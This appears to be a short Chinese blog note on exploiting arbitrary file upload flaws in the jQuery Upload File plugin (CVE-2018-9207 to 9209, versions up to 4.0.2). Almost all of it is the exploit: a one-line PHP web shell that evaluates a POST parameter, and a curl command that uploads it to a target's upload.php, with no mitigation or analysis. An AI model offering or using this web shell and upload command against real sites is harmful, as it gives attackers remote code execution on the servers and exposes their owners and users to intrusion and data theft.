【笔记】jQuery任意文件上传漏洞利用

发表于 更新于 阅读次数:

前言

CVE-2018-9207 CVE-2018-9208 CVE-2018-9209
jQuery任意文件上传漏洞利用

漏洞利用前提

  • 使用了 jQuery Upload File <= 4.0.2 作为文件上传组件

exp

x.php
1
<?php eval($_POST['x']);?>
1
curl -F "[email protected]" "http://example.com/upload.php"

完成